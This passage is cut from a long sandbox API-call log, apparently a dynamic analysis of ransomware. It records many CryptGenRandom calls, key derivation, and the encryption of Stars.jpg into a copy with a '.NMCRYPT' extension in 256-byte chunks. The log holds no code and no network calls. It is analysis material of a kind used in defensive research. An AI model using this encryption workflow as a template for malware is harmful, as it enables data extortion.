pbBuffer=0x2d7e630) returned 1 [0166.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.271] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0166.271] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0166.272] CryptCreateHash (in: hProv=0x8e3000, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44480c | out: phHash=0x1d44480c) returned 1 [0166.272] CryptHashData (hHash=0x9ad2f8, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0166.272] CryptDeriveKey (in: hProv=0x8e3000, Algid=0x6610, hBaseData=0x9ad2f8, dwFlags=0x4, phKey=0x1d444810 | out: phKey=0x1d444810*=0x9ad738) returned 1 [0166.272] CryptSetKeyParam (hKey=0x9ad738, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0166.272] CryptSetKeyParam (hKey=0x9ad738, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0166.272] wcslen (_String="\\\\?\\") returned 0x4 [0166.272] CryptDuplicateKey (in: hKey=0x9ad738, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad7f8) returned 1 [0166.272] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.jpg.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\stars.jpg.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c4 [0166.272] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\stars.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15b0 [0166.272] GetFileSizeEx (in: hFile=0x15b0, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=7505) returned 1 [0166.274] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.274] GetLastError () returned 0x0 [0166.274] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.275] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.275] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.275] GetLastError () returned 0x0 [0166.275] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.275] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.275] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.275] GetLastError () returned 0x0 [0166.275] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.275] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.275] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.275] GetLastError () returned 0x0 [0166.275] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.275] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.276] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.276] GetLastError () returned 0x0 [0166.276] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.276] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.276] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.276] GetLastError () returned 0x0 [0166.276] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.276] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.276] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.276] GetLastError () returned 0x0 [0166.276] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.276] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.276] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.276] GetLastError () returned 0x0 [0166.276] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.276] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.276] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.276] GetLastError () returned 0x0 [0166.276] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.276] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.276] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.276] GetLastError () returned 0x0 [0166.276] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.276] ReadFile (in: 